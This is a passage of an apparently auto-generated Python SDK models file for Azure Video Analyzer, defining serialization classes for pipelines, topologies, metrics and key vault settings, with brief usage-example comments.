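#   assert auth.serialize()["@type"] == "#Microsoft.VideoAnalyzer.JwtAuthentication"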
class KeyVaultProperties(msrest.serialization.Model):
"""The details for accessing the encryption keys in Key Vault.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:param key_identifier: Required. The URL of the Key Vault key used to encrypt the account. The
key may either be versioned (for example https://vault/keys/mykey/version1) or reference a key
without a version (for example https://vault/keys/mykey).
:type key_identifier: str
:ivar current_key_identifier: The current key used to encrypt the Video Analyzer account,
including the key version.
:vartype current_key_identifier: str
"""
_validation = {
'key_identifier': {'required': True},
'current_key_identifier': {'readonly': True},
}
_attribute_map = {
'key_identifier': {'key': 'keyIdentifier', 'type': 'str'},
'current_key_identifier': {'key': 'currentKeyIdentifier', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(KeyVaultProperties, self).__init__(**kwargs)
self.key_identifier = kwargs['key_identifier']
self.current_key_identifier = None
class ListProvisioningTokenInput(msrest.serialization.Model):
"""The input parameters to generate registration token for the Azure Video Analyzer IoT edge module.
All required parameters must be populated in order to send to Azure.
:param expiration_date: Required. The desired expiration date of the registration token. The
Azure Video Analyzer IoT edge module must be initialized and connected to the Internet prior to
the token expiration date.
:type expiration_date: ~datetime.datetime
"""
_validation = {
'expiration_date': {'required': True},
}
_attribute_map = {
'expiration_date': {'key': 'expirationDate', 'type': 'iso-8601'},
}
def __init__(
self,
**kwargs
):
super(ListProvisioningTokenInput, self).__init__(**kwargs)
self.expiration_date = kwargs['expiration_date']
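# Hedged usage sketch (editor's addition): 'expiration_date' is declared with
# the 'iso-8601' serialization type, so a timezone-aware datetime becomes an
# ISO-8601 string on the wire. The date below is illustrative.
#
#   import datetime
#   body = ListProvisioningTokenInput(
#       expiration_date=datetime.datetime(2023, 1, 1, tzinfo=datetime.timezone.utc)
#   ).serialize()
#   # body == {"expirationDate": "2023-01-01T00:00:00Z"} (exact formatting is msrest's)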
class LivePipeline(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish the connection (with exponential backoff), checking to see if the camera bitrate
is now below the reserved capacity. Doing so ensures that one 'noisy neighbor' does not
affect other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipeline, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
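# Hedged usage sketch (editor's addition): only the writable properties are
# accepted here; 'state' stays None until the service reports it.
# ParameterDefinition is defined further down in this module, and all names and
# values below are illustrative.
#
#   pipeline = LivePipeline(
#       topology_name="lobby-camera-topology",
#       bitrate_kbps=1500,
#       parameters=[ParameterDefinition(name="rtspUrl", value="rtsp://camera01/stream")],
#   )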
class LivePipelineCollection(msrest.serialization.Model):
"""A collection of LivePipeline items.
:param value: A collection of LivePipeline items.
:type value: list[~video_analyzer.models.LivePipeline]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[LivePipeline]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
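# Hedged usage sketch (editor's addition): a collection is one page of results
# plus an optional continuation link. The generated operations layer normally
# follows '@nextLink' for you; manual paging looks roughly like this, where the
# 'fetch_page' callable is hypothetical.
#
#   page = LivePipelineCollection.deserialize(raw_json)
#   items = list(page.value or [])
#   while page.next_link:
#       page = LivePipelineCollection.deserialize(fetch_page(page.next_link))
#       items.extend(page.value or [])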
class LivePipelineOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the live pipeline.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the live pipeline operation.
:vartype name: str
:ivar status: The status of the live pipeline operation.
:vartype status: str
:ivar error: The error details for the live pipeline operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class LivePipelineUpdate(ProxyResource):
"""Live pipeline represents a unique instance of a live topology, used for real-time ingestion, archiving and publishing of content for a unique RTSP camera.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: The reference to an existing pipeline topology defined for real-time
content processing. When activated, this live pipeline will process content according to the
pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:param bitrate_kbps: Maximum bitrate capacity in Kbps reserved for the live pipeline. The
allowed range is from 500 to 3000 Kbps in increments of 100 Kbps. If the RTSP camera exceeds
this capacity, then the service will disconnect temporarily from the camera. It will retry to
re-establish the connection (with exponential backoff), checking to see if the camera bitrate
is now below the reserved capacity. Doing so ensures that one 'noisy neighbor' does not
affect other live pipelines in your account.
:type bitrate_kbps: int
:ivar state: Current state of the pipeline (read-only). Possible values include: "Inactive",
"Activating", "Active", "Deactivating".
:vartype state: str or ~video_analyzer.models.LivePipelineState
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'bitrate_kbps': {'key': 'properties.bitrateKbps', 'type': 'int'},
'state': {'key': 'properties.state', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(LivePipelineUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.bitrate_kbps = kwargs.get('bitrate_kbps', None)
self.state = None
self.parameters = kwargs.get('parameters', None)
class LogSpecification(msrest.serialization.Model):
"""A diagnostic log emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The diagnostic log category name.
:vartype name: str
:ivar display_name: The diagnostic log category display name.
:vartype display_name: str
:ivar blob_duration: The time range for requests in each blob.
:vartype blob_duration: str
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'blob_duration': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'blob_duration': {'key': 'blobDuration', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(LogSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.blob_duration = None
class MetricDimension(msrest.serialization.Model):
"""A metric dimension.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric dimension name.
:vartype name: str
:ivar display_name: The display name for the dimension.
:vartype display_name: str
:ivar to_be_exported_for_shoebox: Whether to export metric to shoebox.
:vartype to_be_exported_for_shoebox: bool
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'to_be_exported_for_shoebox': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'to_be_exported_for_shoebox': {'key': 'toBeExportedForShoebox', 'type': 'bool'},
}
def __init__(
self,
**kwargs
):
super(MetricDimension, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.to_be_exported_for_shoebox = None
class MetricSpecification(msrest.serialization.Model):
"""A metric emitted by service.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The metric name.
:vartype name: str
:ivar display_name: The metric display name.
:vartype display_name: str
:ivar display_description: The metric display description.
:vartype display_description: str
:ivar unit: The metric unit. Possible values include: "Bytes", "Count", "Milliseconds".
:vartype unit: str or ~video_analyzer.models.MetricUnit
:ivar aggregation_type: The metric aggregation type. Possible values include: "Average",
"Count", "Total".
:vartype aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:ivar lock_aggregation_type: The metric lock aggregation type. Possible values include:
"Average", "Count", "Total".
:vartype lock_aggregation_type: str or ~video_analyzer.models.MetricAggregationType
:param supported_aggregation_types: Supported aggregation types.
:type supported_aggregation_types: list[str]
:ivar dimensions: The metric dimensions.
:vartype dimensions: list[~video_analyzer.models.MetricDimension]
:ivar enable_regional_mdm_account: Indicates whether regional MDM account is enabled.
:vartype enable_regional_mdm_account: bool
:ivar source_mdm_account: The source MDM account.
:vartype source_mdm_account: str
:ivar source_mdm_namespace: The source MDM namespace.
:vartype source_mdm_namespace: str
:ivar supported_time_grain_types: The supported time grain types.
:vartype supported_time_grain_types: list[str]
"""
_validation = {
'name': {'readonly': True},
'display_name': {'readonly': True},
'display_description': {'readonly': True},
'unit': {'readonly': True},
'aggregation_type': {'readonly': True},
'lock_aggregation_type': {'readonly': True},
'dimensions': {'readonly': True},
'enable_regional_mdm_account': {'readonly': True},
'source_mdm_account': {'readonly': True},
'source_mdm_namespace': {'readonly': True},
'supported_time_grain_types': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display_name': {'key': 'displayName', 'type': 'str'},
'display_description': {'key': 'displayDescription', 'type': 'str'},
'unit': {'key': 'unit', 'type': 'str'},
'aggregation_type': {'key': 'aggregationType', 'type': 'str'},
'lock_aggregation_type': {'key': 'lockAggregationType', 'type': 'str'},
'supported_aggregation_types': {'key': 'supportedAggregationTypes', 'type': '[str]'},
'dimensions': {'key': 'dimensions', 'type': '[MetricDimension]'},
'enable_regional_mdm_account': {'key': 'enableRegionalMdmAccount', 'type': 'bool'},
'source_mdm_account': {'key': 'sourceMdmAccount', 'type': 'str'},
'source_mdm_namespace': {'key': 'sourceMdmNamespace', 'type': 'str'},
'supported_time_grain_types': {'key': 'supportedTimeGrainTypes', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(MetricSpecification, self).__init__(**kwargs)
self.name = None
self.display_name = None
self.display_description = None
self.unit = None
self.aggregation_type = None
self.lock_aggregation_type = None
self.supported_aggregation_types = kwargs.get('supported_aggregation_types', None)
self.dimensions = None
self.enable_regional_mdm_account = None
self.source_mdm_account = None
self.source_mdm_namespace = None
self.supported_time_grain_types = None
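# Hedged usage sketch (editor's addition): nearly every field here is read-only,
# so locally constructed instances carry None everywhere except
# 'supported_aggregation_types'; meaningful values arrive via deserialization
# from a service response. The payload below is illustrative.
#
#   spec = MetricSpecification.deserialize(
#       {"name": "IngressBytes", "unit": "Bytes", "aggregationType": "Total"}
#   )
#   assert (spec.name, spec.unit, spec.aggregation_type) == ("IngressBytes", "Bytes", "Total")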
class NetworkAccessControl(msrest.serialization.Model):
"""Network access control for video analyzer account.
:param integration: Public network access for integration group.
:type integration: ~video_analyzer.models.GroupLevelAccessControl
:param ingestion: Public network access for ingestion group.
:type ingestion: ~video_analyzer.models.GroupLevelAccessControl
:param consumption: Public network access for consumption group.
:type consumption: ~video_analyzer.models.GroupLevelAccessControl
"""
_attribute_map = {
'integration': {'key': 'integration', 'type': 'GroupLevelAccessControl'},
'ingestion': {'key': 'ingestion', 'type': 'GroupLevelAccessControl'},
'consumption': {'key': 'consumption', 'type': 'GroupLevelAccessControl'},
}
def __init__(
self,
**kwargs
):
super(NetworkAccessControl, self).__init__(**kwargs)
self.integration = kwargs.get('integration', None)
self.ingestion = kwargs.get('ingestion', None)
self.consumption = kwargs.get('consumption', None)
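# Hedged usage sketch (editor's addition): each traffic group gets its own
# GroupLevelAccessControl, and the enum-like values travel as plain strings on
# the wire.
#
#   nac = NetworkAccessControl(
#       integration=GroupLevelAccessControl(public_network_access="Enabled"),
#       ingestion=GroupLevelAccessControl(public_network_access="Disabled"),
#       consumption=GroupLevelAccessControl(public_network_access="Enabled"),
#   )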
class NodeInput(msrest.serialization.Model):
"""Describes an input signal to be used on a pipeline node.
All required parameters must be populated in order to send to Azure.
:param node_name: Required. The name of the upstream node in the pipeline whose output is
used as input of the current node.
:type node_name: str
"""
_validation = {
'node_name': {'required': True},
}
_attribute_map = {
'node_name': {'key': 'nodeName', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(NodeInput, self).__init__(**kwargs)
self.node_name = kwargs['node_name']
class Operation(msrest.serialization.Model):
"""An operation.
All required parameters must be populated in order to send to Azure.
:param name: Required. The operation name.
:type name: str
:param display: The operation display name.
:type display: ~video_analyzer.models.OperationDisplay
:param origin: Origin of the operation.
:type origin: str
:param properties: Operation properties format.
:type properties: ~video_analyzer.models.Properties
:param is_data_action: Whether the operation applies to data-plane.
:type is_data_action: bool
:param action_type: Indicates the action type. Possible values include: "Internal".
:type action_type: str or ~video_analyzer.models.ActionType
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'display': {'key': 'display', 'type': 'OperationDisplay'},
'origin': {'key': 'origin', 'type': 'str'},
'properties': {'key': 'properties', 'type': 'Properties'},
'is_data_action': {'key': 'isDataAction', 'type': 'bool'},
'action_type': {'key': 'actionType', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(Operation, self).__init__(**kwargs)
self.name = kwargs['name']
self.display = kwargs.get('display', None)
self.origin = kwargs.get('origin', None)
self.properties = kwargs.get('properties', None)
self.is_data_action = kwargs.get('is_data_action', None)
self.action_type = kwargs.get('action_type', None)
class OperationCollection(msrest.serialization.Model):
"""A collection of Operation items.
:param value: A collection of Operation items.
:type value: list[~video_analyzer.models.Operation]
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[Operation]'},
}
def __init__(
self,
**kwargs
):
super(OperationCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
class OperationDisplay(msrest.serialization.Model):
"""Operation details.
:param provider: The service provider.
:type provider: str
:param resource: Resource on which the operation is performed.
:type resource: str
:param operation: The operation type.
:type operation: str
:param description: The operation description.
:type description: str
"""
_attribute_map = {
'provider': {'key': 'provider', 'type': 'str'},
'resource': {'key': 'resource', 'type': 'str'},
'operation': {'key': 'operation', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(OperationDisplay, self).__init__(**kwargs)
self.provider = kwargs.get('provider', None)
self.resource = kwargs.get('resource', None)
self.operation = kwargs.get('operation', None)
self.description = kwargs.get('description', None)
class ParameterDeclaration(msrest.serialization.Model):
"""Single topology parameter declaration. Declared parameters can and must be referenced throughout the topology and can optionally have default values to be used when they are not defined in the pipelines.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter.
:type name: str
:param type: Required. Type of the parameter. Possible values include: "String",
"SecretString", "Int", "Double", "Bool".
:type type: str or ~video_analyzer.models.ParameterType
:param description: Description of the parameter.
:type description: str
:param default: The default value for the parameter to be used if the pipeline does not specify
a value.
:type default: str
"""
_validation = {
'name': {'required': True},
'type': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'default': {'key': 'default', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDeclaration, self).__init__(**kwargs)
self.name = kwargs['name']
self.type = kwargs['type']
self.description = kwargs.get('description', None)
self.default = kwargs.get('default', None)
class ParameterDefinition(msrest.serialization.Model):
"""Defines the parameter value of an specific pipeline topology parameter. See pipeline topology parameters for more information.
All required parameters must be populated in order to send to Azure.
:param name: Required. Name of the parameter declared in the pipeline topology.
:type name: str
:param value: Parameter value to be applied on this specific pipeline.
:type value: str
"""
_validation = {
'name': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'value': {'key': 'value', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(ParameterDefinition, self).__init__(**kwargs)
self.name = kwargs['name']
self.value = kwargs.get('value', None)
class PemCertificateList(CertificateSource):
"""A list of PEM formatted certificates.
All required parameters must be populated in order to send to Azure.
:param type: Required. The discriminator for derived types. Constant filled by server.
:type type: str
:param certificates: Required. PEM formatted public certificates. One certificate per entry.
:type certificates: list[str]
"""
_validation = {
'type': {'required': True},
'certificates': {'required': True},
}
_attribute_map = {
'type': {'key': '@type', 'type': 'str'},
'certificates': {'key': 'certificates', 'type': '[str]'},
}
def __init__(
self,
**kwargs
):
super(PemCertificateList, self).__init__(**kwargs)
self.type = '#Microsoft.VideoAnalyzer.PemCertificateList' # type: str
self.certificates = kwargs['certificates']
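# Hedged usage sketch (editor's addition): like the other polymorphic models in
# this module, the '@type' value written by __init__ is what lets the base
# class pick this subclass back out of a payload on deserialization. The
# certificate content below is a placeholder.
#
#   source = PemCertificateList(
#       certificates=["-----BEGIN CERTIFICATE-----\n...\n-----END CERTIFICATE-----"]
#   )
#   assert source.serialize()["@type"] == "#Microsoft.VideoAnalyzer.PemCertificateList"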
class PipelineJob(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJob, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineJobCollection(msrest.serialization.Model):
"""A collection of PipelineJob items.
:param value: A collection of PipelineJob items.
:type value: list[~video_analyzer.models.PipelineJob]
:param next_link: A link to the next page of the collection (when the collection contains too
many results to return in one response).
:type next_link: str
"""
_attribute_map = {
'value': {'key': 'value', 'type': '[PipelineJob]'},
'next_link': {'key': '@nextLink', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobCollection, self).__init__(**kwargs)
self.value = kwargs.get('value', None)
self.next_link = kwargs.get('next_link', None)
class PipelineJobError(msrest.serialization.Model):
"""Details about the error for a failed pipeline job.
:param code: The error code.
:type code: str
:param message: The error message.
:type message: str
"""
_attribute_map = {
'code': {'key': 'code', 'type': 'str'},
'message': {'key': 'message', 'type': 'str'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobError, self).__init__(**kwargs)
self.code = kwargs.get('code', None)
self.message = kwargs.get('message', None)
class PipelineJobOperationStatus(msrest.serialization.Model):
"""Used for tracking the status of an operation on the pipeline job.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar name: The name of the pipeline job operation.
:vartype name: str
:ivar status: The status of the pipeline job operation.
:vartype status: str
:ivar error: The error details for the pipeline job operation.
:vartype error: ~video_analyzer.models.ErrorDetail
"""
_validation = {
'name': {'readonly': True},
'status': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'status': {'key': 'status', 'type': 'str'},
'error': {'key': 'error', 'type': 'ErrorDetail'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobOperationStatus, self).__init__(**kwargs)
self.name = None
self.status = None
self.error = None
class PipelineJobUpdate(ProxyResource):
"""Pipeline job represents a unique instance of a batch topology, used for offline processing of selected portions of archived content.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param topology_name: Reference to an existing pipeline topology. When activated, this pipeline
job will process content according to the pipeline topology definition.
:type topology_name: str
:param description: An optional description for the pipeline.
:type description: str
:ivar state: Current state of the pipeline (read-only). Possible values include: "Processing",
"Canceled", "Completed", "Failed".
:vartype state: str or ~video_analyzer.models.PipelineJobState
:ivar expiration: The date-time by when this pipeline job will be automatically deleted from
your account.
:vartype expiration: ~datetime.datetime
:ivar error: Details about the error, in case the pipeline job fails.
:vartype error: ~video_analyzer.models.PipelineJobError
:param parameters: List of the instance level parameter values for the user-defined topology
parameters. A pipeline can only define or override parameter values for parameters which have
been declared in the referenced topology. Topology parameters without a default value must be
defined. Topology parameters with a default value can optionally be overridden.
:type parameters: list[~video_analyzer.models.ParameterDefinition]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'state': {'readonly': True},
'expiration': {'readonly': True},
'error': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'topology_name': {'key': 'properties.topologyName', 'type': 'str'},
'description': {'key': 'properties.description', 'type': 'str'},
'state': {'key': 'properties.state', 'type': 'str'},
'expiration': {'key': 'properties.expiration', 'type': 'iso-8601'},
'error': {'key': 'properties.error', 'type': 'PipelineJobError'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDefinition]'},
}
def __init__(
self,
**kwargs
):
super(PipelineJobUpdate, self).__init__(**kwargs)
self.topology_name = kwargs.get('topology_name', None)
self.description = kwargs.get('description', None)
self.state = None
self.expiration = None
self.error = None
self.parameters = kwargs.get('parameters', None)
class PipelineTopology(ProxyResource):
"""Pipeline topology describes the processing steps to be applied when processing content for a particular outcome. The topology should be defined according to the scenario to be achieved and can be reused across many pipeline instances which share the same processing characteristics. For instance, a pipeline topology which captures content from a RTSP camera and archives the content can be reused across many different cameras, as long as the same processing is to be applied across all the cameras. Individual instance properties can be defined through the use of user-defined parameters, which allow for a topology to be parameterized. This allows individual pipelines refer to different values, such as individual cameras' RTSP endpoints and credentials. Overall a topology is composed of the following:
* Parameters: list of user defined parameters that can be references across the topology nodes.
* Sources: list of one or more data sources nodes such as an RTSP source which allows for content to be ingested from cameras.
* Processors: list of nodes which perform data analysis or transformations.
* Sinks: list of one or more data sinks which allow for data to be stored or exported to other destinations.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: Fully qualified resource ID for the resource. Ex -
/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{resourceProviderNamespace}/{resourceType}/{resourceName}.
:vartype id: str
:ivar name: The name of the resource.
:vartype name: str
:ivar type: The type of the resource. E.g. "Microsoft.Compute/virtualMachines" or
"Microsoft.Storage/storageAccounts".
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~video_analyzer.models.SystemData
:param kind: Required. Topology kind. Possible values include: "Live", "Batch".
:type kind: str or ~video_analyzer.models.Kind
:param sku: Required. Describes the properties of a SKU.
:type sku: ~video_analyzer.models.Sku
:param description: An optional description of the pipeline topology. It is recommended that
the expected use of the topology be described here.
:type description: str
:param parameters: List of the topology parameter declarations. Parameters declared here can
be referenced throughout the topology nodes through the use of the "${PARAMETER_NAME}" string
pattern. Parameters can have optional default values and can later be defined in individual
instances of the pipeline.
:type parameters: list[~video_analyzer.models.ParameterDeclaration]
:param sources: List of the topology source nodes. Source nodes enable external data to be
ingested by the pipeline.
:type sources: list[~video_analyzer.models.SourceNodeBase]
:param processors: List of the topology processor nodes. Processor nodes enable pipeline data
to be analyzed, processed or transformed.
:type processors: list[~video_analyzer.models.ProcessorNodeBase]
:param sinks: List of the topology sink nodes. Sink nodes allow pipeline data to be stored or
exported.
:type sinks: list[~video_analyzer.models.SinkNodeBase]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'type': {'readonly': True},
'system_data': {'readonly': True},
'kind': {'required': True},
'sku': {'required': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'system_data': {'key': 'systemData', 'type': 'SystemData'},
'kind': {'key': 'kind', 'type': 'str'},
'sku': {'key': 'sku', 'type': 'Sku'},
'description': {'key': 'properties.description', 'type': 'str'},
'parameters': {'key': 'properties.parameters', 'type': '[ParameterDeclaration]'},
'sources': {'key': 'properties.sources', 'type': '[SourceNodeBase]'},
'processors': {'key': 'properties.processors', 'type': '[ProcessorNodeBase]'},
'sinks': {'key': 'properties.sinks', 'type': '[SinkNodeBase]'},
}
def __init__(
self,
**kwargs
):
super(PipelineTopology, self).__init__(**kwargs)
self.kind = kwargs['kind']
self.sku = kwargs['sku']
self.description = kwargs.get('description', None)
self.parameters = kwargs.get('parameters', None)
self.sources = kwargs.get('sources', None)
self.processors = kwargs.get('processors', None)
self.sinks = kwargs.get('sinks', None)
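# Hedged usage sketch (editor's addition): a minimal live topology wiring an
# RTSP source into a video sink via the "${PARAMETER_NAME}" pattern described
# above. RtspSource, NodeInput, ParameterDeclaration and Sku appear elsewhere
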